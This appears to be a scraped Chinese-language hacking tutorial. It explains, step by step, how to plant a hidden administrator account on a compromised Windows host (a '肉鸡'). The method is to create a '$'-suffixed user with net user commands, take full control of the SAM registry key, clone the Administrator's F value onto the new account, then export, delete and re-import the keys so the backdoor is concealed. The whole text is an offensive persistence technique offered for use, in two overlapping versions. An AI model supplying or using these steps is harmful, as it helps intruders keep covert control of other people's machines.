对regedit.exe我想大家都很熟悉,但却不能对注册表的项键设置权限,而regedt32.exe最大的优点就是能够对注册表的项键设置权限。nt/2000/xp的帐户信息都在注册表的HKEY_LOCAL_MACHINE/SAM/SAM键下,但是除了系统用户SYSTEM外,其它用户都无权查看到里面的信息,因此我首先用regedt32.exe对SAM键为我设置为“完全控制”权限。这样就可以对SAM键内的信息进行读写了了。具体步聚如下:
1、假设我们是以超级用户administrator登录到开有终端服务的肉鸡上的,首先在命令行下或帐户管理器中建立一个帐户:hacker$,这里我在命令行下建立这个帐户 net user hacker$ 1234 /add
2、在开始/运行中输入:regedt32.exe并回车来运行regedt32.exe。
3、点“权限”以后会弹出窗口点添加将我登录时的帐户添加到安全栏内,这里我是以administrator的身份登录的,所以我就将administrator加入,并设置权限为“完全控制"。这里需要说明一下:最好是添加你登录的帐户或帐户所在的组,切莫修改原有的帐户或组,否则将会带来一系列不必要的问题。等隐藏超级用户建好以,再来这里将你添加的帐户删除即可。
4、再点“开始”→“运行”并输入"regedit.exe" 回车,启动注册表编辑器regedit.exe。 打开键:HKEY_LOCAL_MAICHINE/SAM/SAM/Domains/account/user/names/hacker$"
步骤:
创建一个以$结尾的用户(因为这样在命令行下不显示该用户)
列:net user laterain$ 123456 /add
net localgroup administrators laterain$ /add
打开注册表(运行:regedit)
进入 HKEY_LOCAL_MACHINE/SAM/SAM
修改SAM的权限为 完全控制
刷新 F5
进入 HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users
复制 HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000001F4 的F的值(此处为管理员)
进入 HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names/laterain$ 查看类型的值(0*3ef)
根据类型的值在 HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users 中找到 laterain$ 的对应名称(000003EF)
将 HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000003EF 的F值改为管理员的
然后导出 HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000001F4
HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000003EF
HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names/laterain$
然后删除用户 laterain$
例:net user laterain$ /delete
然后导入刚才导出的文件
新闻热点
疑难解答